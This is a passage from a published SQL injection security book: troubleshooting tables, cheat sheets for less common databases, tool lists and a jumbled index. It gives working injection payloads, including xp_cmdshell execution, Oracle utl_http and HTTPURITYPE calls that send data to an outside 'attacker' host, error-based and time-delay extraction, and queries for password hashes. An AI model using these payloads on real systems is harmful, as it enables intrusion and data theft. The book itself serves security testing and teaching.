SQL INJECTION SECOND EDITIOn

Troubleshooting SQL Injection Attacks 523 Table 11.24 Troubleshooting SQL Injection Reference Error/Challenge Solution Challenge Change your UNION SELECT statement to Performing a UNION SELECT attack read UNION ALL SELECT. This resolves the where the original query is retrieving a problem with UNION SELECT attempting to column of type image perform a compare operation against an image Error Message data type. Image is incompatible with int / For example: The image data type cannot be UNION ALL SELECT null, null, null selected as DISTINCT because it is not comparable. Microsoft SQL Server Microsoft SQL Server supports stacked queries Challenge using the semicolon character (;) to begin each Injecting into an ORDER BY clause new query. A variety of attacks, such as Your injected data is being placed time-delay-based data retrieval and the to the right-hand side of an ORDER execution of extended stored procedures, BY clause. Many of the usual tricks can be conducted in this way. such as UNION SELECT will be ORDER BY 1; EXEC master..xp_cmdshell unsuccessful. 'cmd' In this example, the following SQL Microsoft SQL Server can also be exploited to query is being executed where the return query result data via error messages. attacker’s data is your injection point: When injecting into an ORDER BY clause the following syntax can be used: SELECT * FROM ORDER BY (1/(@@version)); -- return the version products GROUP BY ORDER BY 1/(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'); attackers_data DESC -- Return name from sysobjects MySQL Server Time-delay-based blind SQL injection techniques can be used within an ORDER BY clause. The following example will trigger a time delay if the current user is root@localhost: ORDER BY(IF((SELECT user()= 'root@localhost'),sleep(2),1)); Oracle The utl_http package can be used to establish outbound HTTP connections over any Transmission Control Protocol (TCP) port of the attacker’s choosing. The following ORDER BY clause establishes an HTTP Continued

524 CHAPTER 11  References Table 11.24 Troubleshooting SQL Injection Reference Error/Challenge Solution connection over port 1000 to the host attacker; the HTTP request contains the Oracle version banner within the request path: ORDER BY utl_http.request ('http://attacker:1000/'||(SELECT banner FROM v$version WHERE rownum=1)) The following ORDER BY clause will raise an error containing the Oracle version banner: ORDER BY utl_inaddr.get_host_name ((select banner from v$version where rownum=1)) PostgreSQL PostgreSQL can be exploited to return query result data via error messages. When injecting into an ORDER BY clause the following syntax can be used: Challenge ORDER BY (SELECT CAST((SELECT Utl_http does not work because the version())::text as Numeric)) public privilege was removed. Error message Many Oracle security guides recommend ORA-00904 invalid identifier that the public privilege be removed from the utl_http package. However, many overlook the fact that the object type HTTPURITYPE can be used to achieve the same aim and is also accessible to public. SELECT HTTPURITYPE( 'http://attacker:1000/'|| (SELECT banner FROM v$version WHERE rownum=1)).getclob() FROM dual Challenge Use a different function where you can control the content of the error message. Here is a Utl_inaddr does not work. There could small list of candidates depending on the be various reasons, such as access database version and its installed components: control lists (ACLs) in Version 11, privileges have been revoked, and ORDER BY Java is not installed. ORDSYS.ORD_DICOM.GETMAPPINGXPATH(( SELECT banner FROM v$version WHERE Error Message rownum=1),null,null) ORA-00904 invalid identifier ORDER BY SYS.DBMS_AW_XML.READAWMETADATA(( ORA-24247 network access denied by SELECT banner FROM v$version WHERE access control list (ACL) – 11g rownum=1),null) ORA-29540 oracle/plsql/net/ InternetAddress Continued

SQL Injection on Other Platforms 525 Table 11.24 Troubleshooting SQL Injection Reference Error/Challenge Solution Challenge ORDER BY CTXSYS.DRITHSX.SN((SELECT banner FROM v$version WHERE You receive an “illegal mix of collations” rownum=1),user) message when performing a UNION SELECT attack against a MySQL ORDER BY database. CTXSYS.CTX_REPORT.TOKEN_TYPE(user, (SELECT banner FROM v$version Error Message WHERE rownum=1)) Illegal mix of collations (latin1_swedish_ This error can be overcome using the CAST ci,IMPLICIT) and (utf8_general_ function. ci,SYSCONST) for operation ‘UNION’ For example: Challenge UNION SELECT user(),null,null; becomes: You receive a “collation conflict” message when performing a UNION UNION SELECT CAST(user() AS SELECT attack against a Microsoft char),null,null; SQL Server database. One way to overcome this error is to read the Error Message Collation property from the database and then use it within the query. In the following example, Cannot resolve collation conflict for we are performing a UNION ALL SELECT column 2 in SELECT statement. query to retrieve the name column from the sysobjects table. Step 1: Retrieve the collation value UNION ALL SELECT SERVERPROPERTY('Collation'),null FROM sysobjects In this example, the Collation property is set to SQL_Latin1_General_CP1_CI_AS. Step 2: Implement the collation value within the UNION SELECT UNION ALL SELECT 1,Name collate SQL_Latin1_General_CP1_CI_AS,null FROM sysobjects SQL INJECTION ON OTHER PLATFORMS This book focuses on the four most popular databases: Microsoft SQL Server, MySQL, Oracle, and PostgreSQL. This section is intended to provide a quick refer- ence for other, less common platforms, such as DB2, Informix, and Ingres.

526 CHAPTER 11  References Table 11.25 Extracting DB2 Database Configuration Information Data Query Version SELECT versionnumber, version_timestamp FROM Current user sysibm.sysversions; SELECT user FROM sysibm.sysdummy1; SELECT session_user FROM sysibm.sysdummy1; SELECT system_user FROM sysibm.sysdummy1; List users SELECT grantee FROM syscat.dbauth; Current user privileges SELECT * FROM syscat.dbauth WHERE grantee =user; SELECT * FROM syscat.tabauth WHERE grantee =user; SELECT * FROM syscat.tabauth; Table 11.26 Extracting DB2 Database Schema Data Query Current database SELECT current server FROM sysibm.sysdummy1; List databases SELECT schemaname FROM syscat.schemata; List tables SELECT name FROM sysibm.systables; List columns SELECT name, tbname, coltype FROM sysibm. syscolumns; DB2 Cheat Sheet The DB2 database server from IBM was historically an uncommon database platform to find integrated with a Web application, however the Linux, Unix and Windows edi- tion (DB2 LUW) is becoming increasingly popular. As such, if you do encounter a SQL injection flaw within a DB2-based application this section will help you exploit it. Enumerating Database Configuration Information and Schema Table 11.25 lists SQL statements used to extract key configuration information. Table 11.26 lists the SQL statements used to enumerate schema information. Blind SQL Injection Functions: DB2 Table 11.27 lists functions that are useful when performing blind SQL injection attacks. Informix Cheat Sheet The Informix database server is distributed by IBM and is not commonly encoun- tered when compared to other database platforms. The following reference should help if you encounter an Informix server in the wild.

SQL Injection on Other Platforms 527 Table 11.27 Blind SQL Injection Functions Data Query String length LENGTH() Extract substring from a given string SUBSTRING(string,offset,length) FROM String (‘ABC’) representation with no sysibm.sysdummy1; single quotes SELECT CHR(65)||CHR(66)||CHR(67); Table 11.28 Extracting Informix Database Configuration Information Data Query Version SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1; Current user SELECT USER FROM systables WHERE tabid = 1; List users select usertype,username, password from sysusers; Current user select tabname, tabauth, grantor, grantee FROM privileges systabauth join systables on systables.tabid = Database server systabauth.tabid host name SELECT DBINFO('dbhostname') FROM systables WHERE tabid=1; Table 11.29 Extracting Informix Database Schema Data Query Current database SELECT DBSERVERNAME FROM systables WHERE tabid = 1; List databases SELECT name, owner FROM sysdatabases; List tables SELECT tabname FROM systables; SELECT tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid; List columns SELECT tabname, colname, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid; Enumerating Database Configuration Information and Schema Table 11.28 lists SQL statements used to extract key configuration information. Table 11.29 lists the SQL statements used to enumerate schema information. Blind SQL Injection Functions: Informix Table 11.30 lists functions that are useful when performing blind SQL injection attacks.

528 CHAPTER 11  References Table 11.30 Blind SQL Injection Functions Data Query String length LENGTH() Extract substring from a SELECT SUBSTRING('ABCD' FROM 4 FOR 1) FROM given string systables where tabid = 1; -- returns 'D' String (‘ABC’) representation SELECT CHR(65)||CHR(66)||CHR(67) FROM with no single quotes systables where tabid = 1; Table 11.31 Extracting Ingres Database Configuration Information Data Query Version SELECT dbmsinfo('_version'); Current user SELECT dbmsinfo('system_user'); SELECT dbmsinfo('session_user'); List users SELECT name, password FROM iiuser; Current user privileges SELECT dbmsinfo('select_syscat'); SELECT dbmsinfo('db_privileges'); SELECT dbmsinfo('current_priv_mask'); SELECT dbmsinfo('db_admin'); SELECT dbmsinfo('security_priv'); SELECT dbmsinfo('create_table'); SELECT dbmsinfo('create_procedure'); Ingres Cheat Sheet The Ingres database is an open source database available for all major operating systems. Ingres is one of the least popular databases to find integrated with a Web application. For further information and Ingres tutorials see http://ariel.its.unimelb. edu.au/~yuan/ingres.html. Enumerating Database Configuration Information and Schema Table 11.31 lists SQL statements used to extract key configuration information. Table 11.32 lists the SQL statements used to enumerate schema information. Blind SQL Injection Functions: Ingres Table 11.33 lists functions that are useful when performing blind SQL injection attacks.

SQL Injection on Other Platforms 529 Table 11.32 Extracting Ingres Database Configuration Data Query Current database SELECT dbmsinfo('database'); List tables SELECT relid, relowner, relloc FROM iirelation WHERE List columns relowner != '$ingres'; SELECT column_name, column_datatype, table_name, table_owner FROM iicolumns; Table 11.33 Blind SQL Injection Functions Data Query String length LENGTH(); Extract substring from a SELECT substr(string, offset, length); -- given string String (‘ABC’) representation SELECT chr(65)||chr(66)||chr(67); with no single quotes Table 11.34 Extracting Sybase Database Configuration Information Data Query Version SELECT @@version; Current user SELECT username(); List users SELECT suser_name(); Current user privileges SELECT user; SELECT name FROM master..syslogins; SELECT show_role(); EXEC sp_helprotect <user>; Sybase Cheat Sheet Sybase and Microsoft SQL Server share a common heritage, and as such many of the approaches used with Microsoft SQL Server will also work with Sybase, often with little or no changes to the syntax of the commands to use. Enumerating Database Configuration Information and Schema Table 11.34 lists SQL statements used to extract key configuration information. Table 11.35 lists the SQL statements used to enumerate schema information.

530 CHAPTER 11  References Table 11.35 Extracting Sybase Database Schema Data Query Current database SELECT db_name(); List databases SELECT name FROM master..sysdatabases; List tables Tables within the current database: SELECT name FROM sysobjects WHERE type='U'; SELECT name FROM sysobjects WHERE type='V';-- Views List columns Tables within the master database: SELECT name FROM master..sysobjects WHERE type='U'; SELECT name FROM master..sysobjects WHERE type='V'; Column names for the tblUsers table within the current database: SELECT name FROM syscolumns WHERE id=object_ id('tblUsers'); Column names for the tblUsers table within the admin database: SELECT name FROM admin..syscolumns WHERE id=object_ id('admin..tblUsers'); Table 11.36 Blind SQL Injection Functions Data Query String length LEN(); u0995 Extract substring from a given string SUBSTRING(string,offset,length); String (‘ABC’) representation with no single quotes SELECT char(65) + char(66) + char(67); Blind SQL Injection Functions: Sybase Table 11.36 lists functions that are useful when performing blind SQL injection attacks. Microsoft Access Microsoft Access databases do not scale well with enterprise applications, and therefore are usually encountered only when the application has minimal database requirements. Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access which you can find here: • www.insomniasec.com/publications/Access-Through-Access.pdf

Resources 531 RESOURCES This section provides a list of links to further reading materials and tools to assist you in discovering, exploiting, and preventing SQL injection vulnerabilities. SQL Injection White Papers • “Advanced SQL Injection” by Victor Chapela: www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt • “Advanced SQL Injection in SQL Server Applications” by Chris Anley: www.ngssoftware.com/papers/advanced_sql_injection.pdf • “Buffer Truncation Abuse in .NET and Microsoft SQL Server” by Gary O’Leary-Steele: http://scanner.sec-1.com/resources/bta.pdf • “Access through Access” by Brett Moore: www.insomniasec.com/publications/Access-Through-Access.pdf • “Time-Based Blind SQL Injection with Heavy Queries” by Chema Alonso: http://technet.microsoft.com/en-us/library/cc512676.aspx SQL Injection Cheat Sheets • PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server, MySQL, PostgreSQL, Ingres, DB2, and Informix: http://pentestmonkey.net/cheat-sheets/ • Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2, and Ingres: http://michaeldaw.org/sql-injection-cheat-sheet/ • Ferruh Mavituna cheat sheets for MySQL, SQL Server, PostgreSQL, and Oracle: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ • Ferruh Mavituna cheat sheets for Oracle: http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ SQL Injection Exploit Tools • Absinthe is a Windows GUI-based exploit tool that supports Microsoft SQL Server, Oracle, PostgreSQL, and Sybase using both blind and error-based SQL injection: www.0x90.org/releases/absinthe/ • SQLBrute is a time- and error-based blind SQL injection tool that supports Microsoft SQL Server and Oracle: https://github.com/GDSSecurity/SQLBrute • Bobcat is a Windows GUI-based tool that supports Microsoft SQL Server exploitation: http://web.mac.com/nmonkee/pub/bobcat.html

532 CHAPTER 11  References • BSQL Hacker is a relatively new player in the SQL injection exploit world. The tool is a Windows-based GUI application that supports Microsoft SQL Server, Oracle, and MySQL. BSQL Hacker supports blind and error-based SQL injection techniques: http://labs.portcullis.co.uk/application/bsql-hacker/ • SQLMap is considered by many to be the best SQL injection exploit tool currently available: http://sqlmap.sourceforge.net/ • Sqlninja is a Microsoft SQL injection tool focused on gaining code execution and written in Perl: http://sqlninja.sourceforge.net/ • Squeeza was released as part of a BlackHat presentation. It focuses on alternative communication channels. Squeeza supports Microsoft SQL Server: www.sensepost.com/research/squeeza/ Password Cracking Tools • Cain & Abel: www.oxid.it • Worauthbf: www.soonerorlater.hu/index.khtml?article_id=513 • Checkpwd: www.red-database-security.com/software/checkpwd.html • John the Ripper: www.openwall.com/john/ SOLUTIONS FAST TRACK Structured Query Language (SQL) Primer • SQL comprises a feature-rich set of statements, operators, and clauses designed to interact with a database server. The most common SQL statements are SELECT, INSERT, UPDATE, DELETE, and DROP. The majority of SQL injection vulnerabilities occur when user-supplied data is included with the WHERE clause portion of a SELECT statement. • The UPDATE and DELETE statements rely on a WHERE clause to determine which records are modified or deleted. When injecting SQL into either an UPDATE or a DELETE statement it is important to understand how your input could affect the database. Avoid injecting OR 1=1 or any other condition that returns true into either of these statements. • The UNION operator is used to combine the results of two or more SELECT statements. UNION SELECT is frequently used to exploit SQL injection vulnerabilities.

Solutions Fast Track 533 SQL Injection Quick Reference • Identifying the database platform is an important step when attempting to exploit a SQL injection vulnerability. Triggering a measurable time delay is a reliable method of accurately identifying the database platform. • When exploiting SQL injection vulnerabilities you are often restricted to returning one column from one row at a time. You can overcome this restriction by concatenating the results from multiple columns and rows into a single string. Bypassing Input Validation Filters • You often can circumvent input validation filters that are designed to handle the single-quote character (‘) by representing string values using character functions. For example, char(65,66,67) is equivalent to ‘ABC’ on Microsoft SQL Server. • HTTP encoding variants such as Unicode and Overlong UTF-8 can sometimes be used to bypass input validation filters. • Input validation filters that rely on rejecting known bad data, often referred to as blacklisting, are frequently flawed. Troubleshooting SQL Injection Attacks • When exploiting a SQL injection flaw using UNION SELECT you may encounter type clash errors when image data type columns are included within the original query. To overcome this common obstacle use UNION ALL SELECT. • Microsoft SQL Server supports stacked queries using the semicolon character to begin each new query. • The Oracle Database Server includes the utl_http package that you can use to establish outbound HTTP connections from the database server host. It is possible to abuse this package to extract database data via HTTP connections to any TCP port. SQL Injection on Other Platforms • The most commonly encountered database platforms are Microsoft SQL Server, Oracle, and MySQL. This chapter included a SQL injection cheat sheet for DB2, Informix, and Ingres databases.



Index tasks, 76 Zed Attack Proxy, 83–85 A automated techniques absinthe abstract syntax tree (AST), 127 Android application code configuration tab, 277 GPL tool, 276 Content-Providers, 111–112, 115, 116 injectable parameter, 277–278 parameterized statements, 378 BSQL hacker SQLiteDatabase, 112–114 extracting database login, 280 SQLiteQueryBuilder, 112–114 features, 278 sqlmap, 112–114 request and injection tab, 279 WebContentResolver, 112 selecting database plugin, 280 application program interfaces (APIs), 371 URL textbox, 279 Aspect-oriented programming (AOP), 424 SQLBrute Asprox Botnet, 73–74 FALSE statement, 281 AST. See abstract syntax tree (AST) python interpreter, 281 automated source code review sqlninja abstract syntax tree (AST), 127 extraction of username, 284 AppCodeScan, 130 SQL server installations, 283 AppScan Source Edition, 135 uploading DNS helper, 284 CodePro AnalytiX, 132 squeeza CodeSecure, 135 DNS channel, 284–286 command-line utilities, 126–127 GET and POST parameters, 286 control flow graph (CFG), 127 Klocwork Solo, 135–136 B lexical analysis, 127 Microsoft analyzer, 131 BCP. See bulk copy program (BCP) Microsoft code analysis tool .NET blind SQL injection techniques (CAT.NET), 131–132 channels, 249 mysql_query( ) function, 127 inference techniques OWASP LAPSE+ project, 130–131 PHP scripts, vulnerabilities in, 132 ASCII( ) function, 244 Pixy, 129–130 bit string, 248 RIPS, 132 bitwise operations, 247 source code analyzers (SCAs), extracting data method, 243–244 one bit information, 239 133–134 SQL Server database, 240 static analysis, 134–135 status parameter, 242 Teachable Static Analysis Workbench SUBSTRING( ) function, 242–243 T-SQL, 247 (TeSA), 132–133 integer value, 248 yet another source code analyzer Bobcat, 225–226 BSQL (YASCA), 129 active session, 227 automated SQL injection discovery databases, 226 remote database, 228 database error, 76 built-in stored procedures, 371 GET and POST requests, 76 bulk copy program (BCP), 311 HP Scrawlr, 80–82 bypassing input validation filters HP WebInspect HTTP encoding, 521, 522 quote filters, 520–521 authentication mechanisms, 77 Hewlett-Packard, 77 testing string, 78 IBM Rational AppScan, 79–80 Paros Proxy, 83–85 SQLiX, 82–83 535

536 Index C using abstraction layers, 400–401 using stored procedures, 399–400 C# applications domain driven security (DDS) coding behavior recognition, 98–99 concept, 366–368 dangerous functions, 103–104 login function, 366 data process, 110–111 encoding output, database, 387–396 Java database connectivity (JDBC), 372 canonicalization approaches NoSQL injection, 395–396 ASCII equivalents, 397 parameterized statements framework, 398 .NET (C#), 373–376 input normalization, 397 advantage, 371 input validity, 398 dynamic string building, 371 normalization process, 397 HTML5 browser storage, 378–379 working with Unicode input, 397–399 Java, 372–373 mobile apps, 377–378 CAT.NET. See Microsoft code analysis tool .NET PHP, 376–377 (CAT.NET) PL/SQL, 377 statements, 372 channels secure coding, 365 database connections validating input OPENROWSET command, 267, 268 .NET, 386 PL/pgSQL functions, 269 blacklisting, 383–384 transmission control protocol (TCP), 267 HTML5, 387 DNS exfiltration Java, 384–386 advantages, 269 mobile apps, 387 GET_HOST function, 269–270 PHP, 386–387 stored procedure, 271, 272 whitelisting, 379–383 universal naming convention (UNC), 271 COLUMN privileges, 185–187 VARBINARY parameter, 271–272 common language runtime (CLR), 301–303 xp_cmdshell procedure, 270 Common Weakness Scoring System (CWSS), 9 zone attacker.com, 273 confirming and recovering SQL injection E-mail exfiltration, 273 HTTP exfiltration attack actions performed by attacker HTTPURITYPE package, 273–274 during incident, 474–475 Oracle function, 274–275 data involved assessment, 473–474 ORDER BY clause, 275 dynamic payloads, 479–481 ICMP exfiltration, 276 incident containment, 472–473 investigations client-side SQL injection digital artifacts, 446–472 attacking client-side databases, 356–358 forensically sound practices, 444–446 local database, 355–356 notification of appropriate individuals, 474 payload of attack, 476–477 CLR. See common language runtime (CLR) static payloads, 477–479 CMS. See content management system (CMS) confirming and terminating SQL injection code-level defenses BENCHMARK function, 75 comments application program interfaces (APIs), 371 back-end server, 70 canonicalization approaches database concatenation operators, 69, 70 exploitation, 68 ASCII equivalents, 397 multiline comments, 68, 69 framework, 398 testing string, 70 input normalization, 397 database comment syntax, 65–67 input validity, 398 DBMS_LOCK.SLEEP( ) function, 76 normalization process, 397 working with Unicode input, 397–399 design techniques avoiding obvious object names, 403–404 database honeypots, 404 handling sensitive data, 401–403 secure development resources, 404–405

Index 537 executing multiple statement PostgreSQL delays Asprox Botnet, 73–74 binary search inference exploits, 254 denial of service (DoS) attacks, 73 bit-by-bit inference exploits, 254 GET parameter, 72 pg_sleep( ) function, 252–253 GROUP BY technique, 71 PL/pgSQL, 253 server-side cursors, 70 testing string, 73 SQL Server delays UNION statements, 71–72 binary search inference exploits, 256 UPDATE statement, 71 bit-by-bit inference exploits, 256–257 WHERE clause, 72 WAITFOR DELAY keyword, 255 inline function database security numeric values, 63–65 application data, locking down strings, 59–63 audit trail maintenance, 428–431 least-privileged database login, 426 numbers and strings, 58–59 oracle error triggers, 429–431 statement, 65 PUBLIC permissions revoking, 427 time delays, 74–76 segregated database logins, 426–427 trial-and-error process, 58 stored procedures, 427 content management system (CMS) strong cryptography, 427–428 CMSUsers table, 8 database server, locking down login.php script, 7–8 Ad Hoc query restriction, 432 PHP script, 3, 8 least-privileged operating system Web application, 7 account, 433 CREATE PROCEDURE privilege patched database server software, cursor injection, 202–203 433–434 SYS.KUPP$PROC, 203 SQL server/Oracle database server weak permissions, 203–204 versions, 433 cross-site scripting (XSS), 77 strengthen controls, 432–433 system objects, 431–432 D database stored procedures, 371 database administrators (DBAs), 290, 359 DB2 cheat sheet database-driven Web applications blind SQL injection functions, 526, 527 three-tier system, 2, 3 database configuration information and database execution plan schema, 526 access execution plans, 458–461 DBAs. See database administrators (DBAs) limitations, 461–462 DBMS_LOCK.SLEEP( ) function, 76 Microsoft SQL Server, 458–459 DDS. See domain driven security (DDS) MySQL, 459–460 deployment considerations observe within cached execution plans, network access control configuration, 439 455–458 unnecessary information leakage Oracle, 459 PostgreSQL, 460–461 configuration techniques, 435 database management system (DBMS), 290 DNS lookups, dummy host names, 436–437 database queries empty default web site, 436 inference methods, 249 HTML noindex Meta Tag, 437 MySQL delays search engine hacking, limit discovery, BENCHMARK( ) function, 250–251 437–438 binary search inference exploits, 251–252 suppress error messages, 434–436 bit-by-bit inference exploits, 252 Web Services Description Language SLEEP( ) function, 250–251 Oracle delays (WSDL) information, 438 alonso, 257 wildcard SSL certificates, 437 DBMS_LOCK package, 257 web and database servers, separate hosts, 439 web server logs, verbosity, 438–439

538 Index design techniques E abstraction layers, 399–400 avoiding obvious object names, 403–404 e-commerce application, 2, 6 database honeypots, 404 E-mail handling sensitive data database, 401–403 exfiltration, 273 incident response, 402 Microsoft SQL Server secure development resources notable projects, 405 database Mail account, 213–214 red-database-security, 405 e-mailing subsystems, 211–212 stored procedures procedure, 213–214 access control, 399 sp_send_dbmail, 213 web application, 400 Oracle, 214–215 enterprise security application program interface digital artifacts database execution plan (ESAPI), 385 access execution plans, 458–461 exploit techniques limitations, 461–462 Microsoft SQL Server, 458–459 arbitrary data, 167, 168 MySQL, 459–460 automated exploitation observe within cached execution plans, 455–458 Bobcat, 225–226 Oracle, 459 BSQL, 226–227 PostgreSQL, 460–461 other tools, 227–228 database object timestamps sqlmap, 224–225 Microsoft SQL Server, 469 black-box attack approach, 140 MySQL, 470–471 conditional statements Oracle, 469–470 content-based approach, 165 PostgreSQL, 471–472 database server technologies, 159 transaction log error-based approach, 163–165 analysis, 463–468 methods, 158–159 Microsoft SQL Server, 463–465 time-based approach, 159–163 MySQL, 466–468 database schema enumeration Oracle, 465–466 MySQL, 178–183 PostgreSQL, 468 Oracle, 184–188 Web server log files, 446–452 PostgreSQL, 183–184 SQL Server, 175–178 DNS. See domain name system (DNS) database server domain driven security (DDS) blind fingerprint, 149–150 internet information server (IIS), 143–144 concept, 366–368 non-blind fingerprint, 144–149 login function, 366 e-commerce application, 141 domain name system (DNS), 436–437 errors dynamic link library (DLL), 313–314 application error, 169 dynamic query, 371 generic error message, 170 dynamic string building techniques GROUP BY clause, 170 built-in command, 16 hybrid attacks, 169 error handling, 18–19 trigger, 169 escape characters handling, 14–15 verbose error messages, 168 handling types, 15–17 escalating privileges idiosyncrasies of, 15 brute-force approach, 198–199 multiple submissions handling, 19–21 CREATE PROCEDURE privilege, 202–204 parameterized queries, 13–14 Oracle, 200–202 PHP code, 14 SQL Server, 194–200 query assembly handling, 17–18 HTML code, 141 string-building techniques, 13–14 injecting into “insert” queries ASCII( ) function, 191 CASE clause, 192

Index 539 CONCAT function, 190 channels corrupt production data, 188 database connections, 267–269 Data Manipulation Language (DML), 188 DNS exfiltration, 269–273 generating insert errors, 191–193 E-mail exfiltration, 273 inserting user determined data, 188–191 HTTP exfiltration, 273–276 other scenarios, 193–194 ICMP exfiltration, 276 scalar subqueries, 192 mobile devices client-side SQL injection Android-based devices, 219–220 attacking client-side databases, 356–358 Content Providers, 219–221 local database, 355–356 inter process communication (IPC), finding and confirmation 219–220 blind SQL injection techniques, 239–249 selId parameter, 222 forcing generic errors, 235 sqlite_master table, 222 injecting queries, 235 WebContentResolver application, 220, spitting and balancing, 235–237 subquery placeholders, 238 221–222 Oracle error messages response-based techniques MySQL, 259–260 access control list (ACL) system, 173 one bit information, 264–267 concat function, 171 Oracle, 263–264 error-controllable messages, 173 PostgreSQL, 260–261 multiple rows, 173 SQL Server, 261–263 output approaches, 173 SELECT statement, 171 time-based techniques SQL*Plus command line, 171 database queries, 249–257 stragg (11g+), 173 inference considerations, 257–258 utl_inadd, 170 utl_inaddr.get_host_name function, 171 F Oracle from Web applications, 142–143 out-of-band communication finding and confirmation E-mail, 211–215 blind SQL injection techniques file system, 215–219 channel techniques, 249 HTTP/DNS, 215 inference techniques, 239–243 password hashes scenarios, 237–239 hash modification, 205 forcing generic errors, 235 MySQL, 206 four-tier architecture, 5–6 Oracle, 207–211 injecting queries, 235 PostgreSQL, 206–207 spitting and balancing SQL Server, 204–206 author parameter, 236 stacked queries, 142–143 id parmeter, 235–236 strings, 165–167 string parameter, 236–237 UNION statements data types, 153–158 G matching columns, 151–153 syntax, 150–151 GET parameters, versus POST parameters, 7 victim.com, 141–142 GET request, 17 vulnerable parameters, 140 exploitation H automated techniques absinthe, 276–278 HTML5 communities, 13 BSQL hacker, 278–280 HTTP exfiltration SQLBrute, 280–282 sqlninja, 283–284 HTTPURITYPE package, 273–274 squeeza, 284–286 Oracle function, 274–275 ORDER BY clause, 275 hybrid attacks cross-site scripting (XSS), 358–359 exploiting authenticated vulnerabilities, 360–361

540 Index leveraging captured data, 358 HTML5, 387 operating system commands, Oracle, 359–360 Java I defaultvalidator, 385 Java server faces (JSF), 384–385 ICMP exfiltration, 276 mobile apps, 387 inference techniques PHP, 386–387 whitelisting ASCII( ) function, 244 binary blob, 380 bitstring, 248 luhn formula, 379 bitwise operations, 247 known value validation, 380–383 extracting data method, 243–244 intercepting filters one bit information, 239 application filters SQL Server database, 240 J2EE filter class, 420–421 status parameter, 242 secure parameter filter (SPF), 420–421 SUBSTRING( ) function, 242–243 filtering web service messages, 422 T-SQL, 247 scripting languages, filter pattern, 421–422 Informix cheat sheet web server filters blind SQL injection functions, 527–528 application program interface (API), database configuration information and 417–418 schema, 527 UrlScan, 419 Ingres cheat sheet WebKnight, 419–420 Internet information server (IIS), 334 blind SQL injection functions, 528–529 Intrusion detection systems (IDSs), 345, database configuration information and schema, 424–425 528, 529 J Injection flaws. See SQL injection flaws inline function Java applications coding behavior recognition, 97–98 numeric values dangerous functions, 102 exploitation, 64 data process, 109–110 principles, 65 single-quote delimiters, 64 Java database connectivity (JDBC), 102, 372 uid parameter, 63 unique identification, 63 K visual representation, 64 keyword-blocking filter, 340 strings finding process, 60 M OR condition, 61 SQL statement, 59–63 Mail Transfer Agents (MTA), 273 Unclosed quotation markerror, 61 Microsoft access databases, 530–531 Microsoft code analysis tool .NET (CAT.NET), input filters bypassing custom filters, 347–348 131–132 case variation, 340 Microsoft SQL Server comments, 340–341 dynamic query execution, 342–345 database non-standard entry points, 348–350 O’Boyle string, 391 null bytes, 345 preceding characters, 392–393 search Query referers, 349 transact-SQL code, 391 SQL injection attacks, 340 wildcard character, 392–393 stripped expressions, 345–346 truncation, 346–347 encoding output, database, 390–393 Unicode encodings, 343 execution plan, database, 458–459 URL encoding, 341–342 object timestamps, database, 469 operating system commands input validation .NET, 386 .NET binary, 321 blacklisting, 383–384 ipconfig command, 318–319

Index 541 surface area configuration, 319 database xp_cmdshell, 318–319 stored procedure code, 393–394 reading files string terminator, 393–394 .NET binary, 301 wildcards, 394 ActiveX control, 300–301 ALTER ASSEMBLY command, 303 database schema enumeration, 178–183 bulk insert method, 297 delays in database queries, 250–252 common language runtime (CLR), 301–303 E-mail system, 211–214 communication mechanism, 299 encoding output, database, 393–394 CREATE ASSEMBLY function, 302 execution plan, database, 459–460 domain name system (DNS), 296–297 file system, 218–219 file system object, 300–301 hierarchical approach, 178 net.exe, 299 INTO OUTFILE, 218, 219 OLE automation, 300 MYD files, 183 query analyzer, 298 mysql and information_schema, 178, 179 RDBMS, 297 object timestamps, database, 470–471 remote file servers, 299 operating system commands scripting.filesystemobject, 300–301 security development lifecycle (SDL), ASP.NET, 318 Hackproofing, 318 296–297 WAMP Environments, 318 stolen-boot.ini, 299–300 out-of-band communication, 211–214 SYSADMIN group, 304 output tables, 182 union query, 297 password hashes, 206 transaction log, 463–465 PASSWORD( ) function, 206 writing files reading files binary files, 310 binary files, 295, 296 bulk copy program (BCP), 311 database, 292 csc.exe, 314–315 DEBUG message, 292 DOS copy command, 311–312 hackproofing, 295 dynamic link library (DLL), 313–314 HEX( ) function, 295 echo commands, 312 LOAD DATA INFILE command, 291 file compiling, 314–315 LOAD_FILE function, 292, 295–296 filesystemobject, 310 NGS Software, 295 meterpreter, 313–314 queries, 294 remote database server, 312–315 remote file system, 295 sp_oacreate, 310 substring function, 296 UNIX, 312–313 text file, 291–292 worms, 312 union statement, 292–294 Microsoft SQL server cheat sheet universal naming convention blind SQL injection functions, 504 database configuration information and schema, (UNC), 296 vulnerable intranet application, 293 500–504 response-based techniques, 259–260 database server attacking transaction log, 466–468 writing files cracking database passwords, 507 apache.org, 309 file read/write, 508 binary files, 308 server 2005 hashes, 507–508 built-in function, 308 xp_cmdshell, 506–507 dumpfile, 307–308 OPENROWSET reauthentication attack, hackproofing, 310 LOAD DATA INFILE command, 307 505–506 UNHEX( ), 308 server privilege escalation, 504–506 user-defined function (UDF), 310 mssql_execute( ) and odbc_prepare( ), 105–106 MySQL cheat sheet MySQL blind SQL injection functions, 508 administrative privileges, 178

